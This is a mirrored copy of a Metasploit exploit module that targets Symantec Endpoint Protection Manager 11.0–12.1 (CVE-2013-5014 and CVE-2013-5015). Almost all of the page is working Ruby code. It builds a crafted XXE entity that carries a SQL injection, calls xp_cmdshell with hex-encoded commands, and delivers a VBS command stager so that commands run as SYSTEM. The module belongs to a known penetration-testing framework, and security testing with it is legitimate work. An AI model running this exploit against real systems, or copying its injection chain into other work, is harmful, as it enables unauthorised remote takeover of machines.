Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include REXML

10
  include Msf::Exploit::CmdStager

11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',

18
        'Description' => %q{

19
          This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager

20
          versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker

21
          can reach SQL injection affected components. As xp_cmdshell is enabled in the included

22
          database instance, it's possible to execute arbitrary system commands on the target

23
          with SYSTEM privileges.

24
        },

25
        'Author' => [

26
          'Stefan Viehbock', # Discovery

27
          'Chris Graham', # PoC exploit

28
          'xistence <xistence[at]0x90.nl>' # Metasploit module

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['CVE', '2013-5014'],

33
          ['CVE', '2013-5015'],

34
          ['OSVDB', '103305'],

35
          ['OSVDB', '103306'],

36
          ['EDB', '31853'],

37
          ['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']

38
        ],

39
        'Arch' => ARCH_X86,

40
        'Platform' => 'win',

41
        'Targets' => [

42
          ['Windows VBS Stager', {}]

43
        ],

44
        'Privileged' => true,

45
        'DisclosureDate' => '2014-02-24',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(9090),

58
        OptString.new('TARGETURI', [true, 'The base path', '/'])

59
      ]

60
    )

61
    deregister_options('CMDSTAGER::FLAVOR')

62
  end

63


64
  def check

65
    res = send_request_cgi(

66
      {

67
        'uri' => normalize_uri(target_uri.path),

68
        'method' => 'GET',

69
      }

70
    )

71


72
    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/

73
      return Exploit::CheckCode::Appears

74
    end

75


76
    Exploit::CheckCode::Safe

77
  end

78


79
  def exploit

80
    print_status("Sending payload")

81
    # Execute the cmdstager, max length of the commands is ~3950

82
    execute_cmdstager({ :flavor => :vbs, :linemax => 3950 })

83
  end

84


85
  def execute_command(cmd, opts = {})

86
    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.

87
    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"

88


89
    # Generate random 'xx032xxxx' sequence number.

90
    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"

91


92
    soap = soap_request(seqnum, command)

93


94
    post_data = Rex::MIME::Message.new

95
    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")

96
    xxe = post_data.to_s

97


98
    res = send_request_cgi(

99
      {

100
        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),

101
        'method' => 'POST',

102
        'vars_get' => { 'ActionType' => 'ConsoleLog' },

103
        'ctype' => "multipart/form-data; boundary=#{post_data.bound}",

104
        'data' => xxe,

105
      }

106
    )

107


108
    if res and res.body !~ /ResponseCode/

109
      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")

110
    end

111
  end

112


113
  def soap_request(seqnum, command)

114
    randpayload = rand_text_alpha(8 + rand(8))

115
    randxxe = rand_text_alpha(8 + rand(8))

116
    entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"

117
    entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"

118


119
    xml = Document.new

120
    xml.add(DocType.new('sepm', "[ METASPLOIT ]"))

121
    xml.add_element("Request")

122
    xxe = xml.root.add_element(randxxe)

123
    xxe.text = "PAYLOAD"

124


125
    xml_s = xml.to_s

126
    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding

127
    xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding

128


129
    xml_s

130
  end

131
end

132


133